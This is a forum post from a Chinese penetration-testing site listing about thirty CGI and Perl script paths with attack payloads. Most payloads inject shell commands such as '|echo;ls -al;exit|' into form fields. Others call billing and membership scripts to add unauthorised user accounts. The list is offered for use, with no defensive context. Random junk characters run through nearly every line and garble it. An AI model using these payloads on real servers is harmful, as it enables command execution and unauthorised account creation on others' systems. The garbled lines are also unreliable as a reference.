中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================
- t  Q" `! G$ k% q$ c. a
. l' r2 {3 U3 Y/smspass.pl
  x, u) q+ z5 F) p$ P  N: `! vusername=username&password=password6 ~* U/ ~; W0 t3 J- x

  [9 Q5 C7 g1 c* Y/ M9 u' S/index.cgi( _7 l, I$ e' x) _. T- H5 D
wei=ren&gen=command
2 I( [7 j" l) |# n9 F  m1 q0 M0 V$ i5 Y/ K4 C- X
/passmaster.cgi
* z8 n, E" L+ v0 P  z! h) r9 h7 W  s  [Action=Add&Username=Username&Password=Password
* @9 g, z# v* ]+ C: C7 l# D! T( |4 }7 [- Q6 y
/accountcreate.cgi$ J+ t5 _! N- F( \5 H: n
username=username&password=password&ref1=|echo;ls|
$ c* E0 D; C/ |$ L. U; ?; K9 k6 Y! T& C' @
/form.cgi, W3 x& P5 Z" Z0 T0 f" O
name=xxxx&email=email&subject=xxxx&response=|echo;ls|7 o' |3 U/ L; o$ O! V

; Y- ~, F- q: a5 C/addusr.pl, Y3 |, S6 |: [- \2 j# E; t8 p# m; t
/cgi-bin/EuroDebit/addusr.pl
( _  `' Z% [- j! F9 i& ]( fuser=username&pass=Password&confirm=Password
; {$ J6 x9 I+ }) V
: u4 T& U$ T% C( ^# f- K" M/ccbill-local.asp/ S! E7 ?( I: @
post_values=username:password8 }+ P0 R5 o; Y4 i. v

: M* W8 L9 z& n1 h! @/count.cgi
* r, ?* H/ _* V0 s, lpinfile=|echo;ls -la;exit|
$ z* K1 a9 P9 k
& q* e  D) v. X3 U7 O/recon.cgi3 O5 K9 a6 \% C9 m5 u, i) n
/recon.cgi?search
. H7 s" U" F8 F1 p9 J0 Y% vsearchoption=1&searchfor=|echo;ls -al;exit|
$ j0 U: C9 p4 b1 f% |, p
2 f8 x, e+ T- K$ w; v4 o! I- {) T+ J/verotelrum.pl
! _" f7 B1 W% A+ F* l2 M* @vercode=username:password:dseegsow:add:amount<&30>: `5 U& G2 T4 i8 {1 Q
% Q4 F5 y) d% a
/af.cgi
) W) d4 L) U. P( }_browser_out=|echo;ls -la;exit;|. V) W0 H' e) A" L
6 o% w, p3 j" @2 `
/modify.cgi7 d3 R- K$ b- {  s3 E  Y& A! K2 A
username=username&password=password&expire=30
& a& I+ |2 ?1 T0 G
6 c4 ~2 @3 M8 N2 w/openjournal.cgi, \  k2 k8 k2 e
edit=1&ct=2&go=|echo;ls -al;exit|
0 i5 J: B0 K4 ~. C+ x: i8 Z& m, w1 F6 y
/gx9passwd.cgi
5 G! h0 S. B* h2 Dcmd=ADD&user=username&pass=password$ U/ _, U& L, r% ?5 }+ X8 y
$ ~8 r; p$ U* \( l* c3 l: s  h
/probecontrol.cgi
1 p9 J" y6 j, [5 [3 kcommand=enable&username=username&password=password
3 a# b4 f$ Z! W7 @
2 |: w' }0 t2 g( D$ ?/recon.cgi7 m, J6 d8 W8 [# {6 K9 L
searchoption=3&searchfor=echo;ls -la;exit  h/ {- D0 v) C/ M3 s

0 R. X- Z' H& \# o! g9 z) J/htadd.pl' y: p+ D; p; \6 z, ~
configfile=|echo; ls -alt; exit
$ A. o6 n5 @' {
# \3 m  c* X% q2 Z3 G  y6 B8 @/gx9passwd.cgi
) J- h) o3 l8 Z* tcmd=ADD&user=username&pass=password
  w  ?- v; B8 ^
3 D" Z. k, m! F" I$ U3 F# n# k/ibill*.pl
5 t4 d0 i0 K0 O) m* L0 q. g5 Dreqtype=add&authpwd=authpwd&username=username&password=password
) Q" P( I8 v) C3 Y+ n% [
  M  D# q$ |, l: ^9 ^) o* a. \/cpay.cgi" I3 k5 ?; S: N0 P, G5 E
command=add_member&username=username(EMAIL)&password=password(DES)
, h9 q8 l( v0 ^. r" I
! G* H& Z3 ~: C; r, t/globill_ut.cgi$ [. B% T3 s1 l& W! {
do=add&username=username&password=password&wpassword=password
$ J3 {/ E8 C7 n3 i
. w7 Q% `% [  z/usercontrol.cgi, \  e/ F8 N7 E* V/ f0 Z" v
command=enable&username=USER&password=PASS: s6 Z% K2 G! ]! G; l( }7 j* m9 T
' f  d7 g# j7 o+ H  u
/globoSALErum.cgi1 D! }7 T, J! q) }. i
action=ADD&seccode=seccode&login=username&password=password
6 J' Y( y- @* v$ D( ]' S4 \
* K. k" U* d( ]/addusr.pl
5 R7 V1 e2 a% l* _0 a. Kuser=USER&pass=PASS&confirm=PASS6 d* o  g; }0 U  \8 x1 p& l6 l, }" C
3 W" T- ]" N; R4 Z% G5 ^. e+ c
/pincount.cgi
, N5 m, s& \) t) [: T- N! x/cgi-bin/mastergate/pincount.cgi
7 Z) q: k# r2 I* S; ?pinfile=|echo;pwd;exit|- `1 N- E* S! n8 h$ r# O* _

! S# ^' c; T2 ]- \. F+ m/accountcreate.cgi) K' |! J9 z! S. p
/cgi-bin/gateway/accountcreate.cgi
+ K" Q7 p0 g  ~7 E3 zusername=username&password=password&password2=password&ref1=|echo;ls -al;exit4 n5 Q+ {. S; v3 [# l" {

' t' @8 T$ x- R/af.cgi8 C8 O/ Y/ {3 L* |8 x1 \; f& A8 Q
/env.cgi
/ b! ~0 S1 J5 P6 |) aADD+;echo;pwd;exit% G" O1 b+ U9 i5 W8 W3 ]1 h

) e1 n  o2 O5 X  P( _5 U/count.cgi  N0 i& j5 L! K" b6 U: f
pinfile=|echo;pwd;exit|
8 `4 b# m4 V+ i+ D* Z. F, s7 T/ y  H( Z" m& F- C
/recon.cgi
) i- `  v( G0 C, P3 N: z. ^/ xsearchoption=1&searchfor=|echo;ls%20-al;exit|( _2 q5 Q% w5 A  ~& ~3 V

6 U' \3 _# C( u5 j/ M# b1 k/add.cgi+ T: n2 L" p% ^- u3 ?- S
username=username&password=password&expire=30
$ E8 A7 f7 b  I
9 j5 u) e9 h4 Y, C2 Z. j* H& M==============================
% O7 `  L. W2 \( D/ h# g8 w* i8 A




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2